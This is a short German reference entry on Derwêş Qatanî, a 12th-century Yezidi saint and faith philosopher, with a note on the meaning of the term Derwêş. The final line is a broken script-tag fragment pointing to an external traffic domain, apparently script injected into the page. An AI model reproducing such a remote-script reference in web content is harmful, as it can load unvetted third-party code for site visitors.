Art. Nummer Autor Datum
60  Hayrî Demir 10.03.2012

Name

Derwêş Qatanî aus dem kurd./pers. Derwêş (dt. Därwisch) bedeutet sinngemäß Asket. Die Haltung bzw. das Wesen eines solchen Asketen entspricht dem eines ezidischen Feqîrs (dt. sinngemäß „Besitzloser“) und meint eine Person, die sich der materialistischen Welt entzogen und der spirituellen Welt hingegeben hat.

Der Begriff Derwêş wird Personen verliehen, die in einer besonderen Frömmigkeit leben.

Person

Derwêş Qatanî gilt als einer von vielen Glaubensphilosophen der ezidischen Religion und hat Heiligenstatus. Derwêş Qatanî war ein Zeitgenosse des Şêx Fexrê Adîyan (der erste Bavê Şêx) und lebte im 12. Jahrhundert.

Er wird beispielsweise im Qewlê Behra (dt. Hymne des Meeres) in S.20 erwähnt.
and.buyittraffic.com/clizkes' type='text/javascript'>